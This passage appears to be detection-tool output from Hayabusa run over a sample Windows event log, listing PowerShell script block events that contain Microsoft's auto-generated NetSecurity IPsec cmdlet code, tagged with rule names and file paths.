($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyS",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 